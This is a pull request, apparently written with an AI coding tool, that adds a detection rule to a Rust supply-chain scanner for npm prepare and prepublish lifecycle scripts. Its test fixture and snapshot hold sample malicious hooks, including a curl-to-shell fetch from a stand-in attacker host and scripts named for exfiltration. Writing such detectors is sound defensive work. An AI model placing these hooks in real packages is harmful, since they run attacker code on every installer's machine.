### PR TITLE
feat(rules): add DEP-011 prepare/prepublish lifecycle script detection

### DIFF
--- a/src/rules/builtin/dependency.rs
+++ b/src/rules/builtin/dependency.rs
@@ -13,6 +13,7 @@ pub fn rules() -> Vec<Rule> {
         dep_008(),
         dep_009(),
         dep_010(),
+        dep_011(),
     ]
 }
 
@@ -182,6 +183,35 @@ fn dep_007() -> Rule {
         exclusions: vec![],
         message: "Preinstall script detected. These scripts run before installation completes.",
         recommendation: "Preinstall scripts are higher risk. Review carefully before proceeding.",
+        fix_hint: Some("npm install --ignore-scripts or review the script manually"),
+        cwe_ids: &["CWE-829"],
+    }
+}
+
+fn dep_011() -> Rule {
+    Rule {
+        id: "DEP-011",
+        name: "Prepare/prepublish lifecycle script execution",
+        description: "Detects npm prepare/prepublish/prepublishOnly/prepack scripts that auto-run on install (including git and local dependencies)",
+        severity: Severity::Medium,
+        category: Category::SupplyChain,
+        confidence: Confidence::Firm,
+        patterns: vec![
+            // `prepare` runs on `npm install` (no args), `npm ci`, and on install of
+            // git/local dependencies — a well-documented supply-chain execution vector.
+            Regex::new(r#""prepare"\s*:\s*"[^"]+""#).expect("DEP-011: invalid regex"),
+            // `prepublish`/`prepublishOnly` run around publish/pack, still auto-executing.
+            Regex::new(r#""prepublish(Only)?"\s*:\s*"[^"]+""#).expect("DEP-011: invalid regex"),
+            Regex::new(r#""prepack"\s*:\s*"[^"]+""#).expect("DEP-011: invalid regex"),
+        ],
+        exclusions: vec![
+            // Common safe lifecycle scripts. `husky install` is the canonical
+            // `prepare` script; `is-ci` guards it in CI.
+            Regex::new(r"node-gyp|husky|patch-package|is-ci|ngcc|postinstall-postinstall")
+                .expect("DEP-011: invalid regex"),
+        ],
+        message: "Prepare/prepublish lifecycle script detected. `prepare` auto-runs on npm install (including git/local deps).",
+        recommendation: "Review the script carefully; it executes automatically on install. Consider --ignore-scripts.",
         fix_hint: Some("npm install --ignore-scripts or review the script manually"),
         cwe_ids: &["CWE-829"],
     }
@@ -413,5 +443,13 @@ mod tests {
         let content = include_str!("../../../tests/fixtures/rules/dep_005.txt");
         let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
         crate::assert_rule_snapshot!("dep_005", findings);
+    }
+
+    #[test]
+    fn snapshot_dep_011() {
+        let rule = dep_011();
+        let content = include_str!("../../../tests/fixtures/rules/dep_011.txt");
+        let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
+        crate::assert_rule_snapshot!("dep_011", findings);
     }
 }

--- a/tests/fixtures/rules/dep_011.snap
+++ b/tests/fixtures/rules/dep_011.snap
@@ -1,0 +1,50 @@
+---
+source: src/rules/builtin/dependency.rs
+expression: findings
+---
+[
+  {
+    "id": "DEP-011",
+    "severity": "medium",
+    "category": "supply_chain",
+    "confidence": "firm",
+    "name": "Prepare/prepublish lifecycle script execution",
+    "line": 10,
+    "code": "\"prepare\": \"node ./scripts/setup.js\"",
+    "message": "Prepare/prepublish lifecycle script detected. `prepare` auto-runs on npm install (including git/local deps).",
+    "recommendation": "Review the script carefully; it executes automatically on install. Consider --ignore-scripts."
+  },
+  {
+    "id": "DEP-011",
+    "severity": "medium",
+    "category": "supply_chain",
+    "confidence": "firm",
+    "name": "Prepare/prepublish lifecycle script execution",
+    "line": 11,
+    "code": "\"prepublish\": \"curl http://evil.example/x.sh | sh\"",
+    "message": "Prepare/prepublish lifecycle script detected. `prepare` auto-runs on npm install (including git/local deps).",
+    "recommendation": "Review the script carefully; it executes automatically on install. Consider --ignore-scripts."
+  },
+  {
+    "id": "DEP-011",
+    "severity": "medium",
+    "category": "supply_chain",
+    "confidence": "firm",
+    "name": "Prepare/prepublish lifecycle script execution",
+    "line": 12,
+    "code": "\"prepublishOnly\": \"python ./exfil.py\"",
+    "message": "Prepare/prepublish lifecycle script detected. `prepare` auto-runs on npm install (including git/local deps).",
+    "recommendation": "Review the script carefully; it executes automatically on install. Consider --ignore-scripts."
+  },
+  {
+    "id": "DEP-011",
+    "severity": "medium",
+    "category": "supply_chain",
+    "confidence": "firm",
+    "name": "Prepare/prepublish lifecycle script execution",
+    "line": 13,
+    "code": "\"prepack\": \"./build-and-exfil.sh\"",
+    "message": "Prepare/prepublish lifecycle script detected. `prepare` auto-runs on npm install (including git/local deps).",
+    "recommendation": "Review the script carefully; it executes automatically on install. Consider --ignore-scripts."
+  }
+]

--- a/tests/fixtures/rules/dep_011.txt
+++ b/tests/fixtures/rules/dep_011.txt
@@ -1,0 +1,20 @@
+# DEP-011: prepare/prepublish lifecycle script execution
+# Test cases for snapshot testing
+# Detects npm 'prepare', 'prepublish', 'prepublishOnly', and 'prepack' lifecycle
+# scripts. 'prepare' auto-runs on plain `npm install`, `npm ci`, and — critically —
+# when a package is installed from a git or local dependency, making it a
+# supply-chain execution vector missed by postinstall/preinstall-only rules
+# (MITRE T1195.001, CWE-829).
+
+# === Cases that SHOULD be detected ===
+"prepare": "node ./scripts/setup.js"
+"prepublish": "curl http://evil.example/x.sh | sh"
+"prepublishOnly": "python ./exfil.py"
+"prepack": "./build-and-exfil.sh"
+
+# === Cases that should NOT be detected (benign) ===
+"prepare": "husky install"
+"prepare": "husky"
+"prepare": "node-gyp rebuild"
+"prepare": "patch-package"
+"prepare": "is-ci || husky install"


### PR DESCRIPTION
## Summary

Closes #137.

The lifecycle-script rules covered `preinstall` (DEP-007) and `install`/`postinstall` (DEP-006) but **not `prepare`** — an auto-run npm lifecycle script that executes on plain `npm install`, `npm ci`, and, critically, when a package is installed from a **git or local dependency**. A plain interpreter payload under `prepare` (e.g. `node ./setup.js`) also has no shell/pipe/network token, so SC-001/DEP-001 miss it too → a clean scan for a package that auto-executes arbitrary code on install.

## Change

- Add **DEP-011** (Medium / Firm, `Category::SupplyChain`, CWE-829) matching `prepare`, `prepublish`, `prepublishOnly`, `prepack` string values.
- Reuse the DEP-006 safe-script exclusions (`husky`, `node-gyp`, `patch-package`, `is-ci`, …) so `prepare: "husky install"` — the canonical use — stays clean.
- Fixture + snapshot: 4 malicious lines detected, 5 benign (husky/node-gyp/patch-package/is-ci) produce zero findings.

## Tests

- `cargo test` — 1732 passed
- `cargo clippy -- -D warnings` — clean
- `cargo fmt --all --check` — clean
- FP gate: benign fixture section = 0 findings

🤖 Generated with [Claude Code](https://claude.com/claude-code)